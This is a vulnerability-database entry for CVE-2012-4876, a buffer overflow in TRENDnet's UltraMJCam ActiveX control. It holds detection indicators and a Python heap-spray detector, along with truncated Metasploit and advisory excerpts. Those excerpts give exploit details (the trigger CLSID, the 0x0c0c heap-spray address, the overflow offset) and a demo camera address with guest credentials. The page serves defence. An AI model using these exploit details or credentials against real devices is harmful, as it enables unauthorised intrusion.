CVE-2012-4876
Published 2012-09-06
Priority P265, critical, CVSS 2.0 score 10
CVSS vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 71.18% (99.3th percentile)
Stack-based buffer overflow in the UltraMJCam ActiveX Control in TRENDnet SecurView TV-IP121WN Wireless Internet Camera allows remote attackers to execute arbitrary code via a long string to the OpenFileDlg method.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trendnet | securview_wireless_internet_camera | — | — |
| trendnet | securview_wireless_internet_camera_activex_control | — | — |
Detection & IOCs
bytes: %u0c0c%u0c0c
- Detect ActiveX instantiation of the UltraMJCam control by its CLSID {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11} in HTML/script content, which is the trigger object for the exploit.
- Monitor for heap-spray pattern using 0x0c0c0c0c as the nop-sled/pivot address; EDX=0x0c0c0c0c at time of exploitation is a strong indicator.
- Presence of UltraMJCamX.ocx loaded in a browser process (iexplore.exe) combined with a call to WideCharToMultiByte with MultiByteCount=0x7532 (30002) is indicative of exploitation.
- The Metasploit module uses SEH-based exploitation with InitialAutoRunScript 'migrate -f'; detect post-exploitation process migration from iexplore.exe shortly after ActiveX load.
- Detect the OpenFileDlg method call with an excessively long sFilter argument (offset 0x600 / 1536+ chars) on the UltraMJCam ActiveX control.
- Flag HTTP responses serving HTML that instantiates CLSID 707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11 alongside large JavaScript unescape() heap-spray blocks.
- The exploit targets only specific IE/Windows combinations; the Metasploit module returns 404 for unsupported user-agents, so detection based solely on HTTP 404 responses from the exploit server is unreliable.
- The module notes UltraMJCamX.ocx as the only application-specific component but flags it as unreliable for use as a ROP/return gadget source, so ROP-chain-based detections tied to that module may miss variants.
- Null byte (0x00) is a bad character for the payload; payloads containing null bytes will not function, so signature-based detection must account for null-free shellcode encodings.
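A content check for the HTTP-response indicators listed above, as an added example (not code from this page or from the sources it indexes). The CLSID, ProgID, method name and 0x0c0c fill value come from the page; the `LARGE_BLOCK_UNITS` threshold, the verdict names and the sample bodies are assumptions constructed for illustration.

```python
import re

# Identifiers below come from the page; the threshold is an assumption.
CLSID = "707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11"
PROGID = "ULTRAMJCAM.ULTRAMJCAM.1"
LARGE_BLOCK_UNITS = 64  # assumed cut-off for a "large" run of %uXXXX units
U_UNIT = re.compile(r"%u([0-9a-f]{4})", re.IGNORECASE)


def analyze(html: str) -> dict:
    """Classify one HTTP response body (already decoded to text)."""
    upper = html.upper()
    units = [u.lower() for u in U_UNIT.findall(html)]
    control = CLSID in upper or PROGID in upper
    method = "OPENFILEDLG" in upper
    # A large unescape() block, or repeated 0x0c0c fill, marks a heap spray.
    spray = "UNESCAPE(" in upper and (
        len(units) >= LARGE_BLOCK_UNITS or units.count("0c0c") >= 2
    )
    if not control:
        verdict = "clean"        # spray-like text alone is out of scope here
    elif spray:
        verdict = "alert"        # control plus spray block in one response
    elif method:
        verdict = "review"       # method call seen, spray may be obfuscated
    else:
        verdict = "inventory"    # control in use, worth knowing about
    return {"verdict": verdict, "control": control, "method": method,
            "escaped_units": len(units), "spray": spray}


# Constructed samples (inert filler, no payload) for the four outcomes.
SAMPLES = {
    "spray_page": '<object classid="clsid:707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11"'
                  ' id="cam"></object><script>var f = unescape("'
                  + "%u0c0c%u0c0c" * 40 + '"); cam.OpenFileDlg(f);</script>',
    "camera_ui": '<object classid="CLSID:{707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11}"'
                 ' width="640" height="480"></object>',
    "scripted": 'var c = new ActiveXObject("UltraMJCam.UltraMJCam.1");'
                ' c.OpenFileDlg(name);',
    "unrelated": '<script>var t = unescape("%u00e9t%u00e9");</script>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, analyze(body))
```

String matching of this kind misses pages that assemble the CLSID or the escaped block at run time, so it complements the host-side indicators in the list rather than replacing them.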
No detection rules found.
Exploit-DB
TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow (Metasploit)
exploitdb·2012-04-06
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in TRENDnet SecurView Internet
Camera's ActiveX control. By supplying a long string of data as the sFilter
argument of the OpenFileDlg() function, it is possible to trigger a buffer
overflow condition due to WideCharToMultiByte (which converts unicode back to)
overwrit
Exploit-DB
TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
exploitdb·2012-03-28
---
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:
File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety:
Metasploit
TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow
metasploit
This module exploits a vulnerability found in TRENDnet SecurView Internet Camera's ActiveX control. By supplying a long string of data as the sFilter argument of the OpenFileDlg() function, it is possible to trigger a buffer overflow condition due to WideCharToMultiByte (which converts unicode back to) overwriting the stack more than it should, which results in arbitrary code execution under the context of the user.
No writeups or analysis indexed.
- http://archives.neohapsis.com/archives/bugtraq/2012-03/0152.html
- http://osvdb.org/80661
- http://retrogod.altervista.org/9sg_trendnet_adv.htm
- http://secunia.com/advisories/48601
- http://www.exploit-db.com/exploits/18675
- http://www.securityfocus.com/bid/52760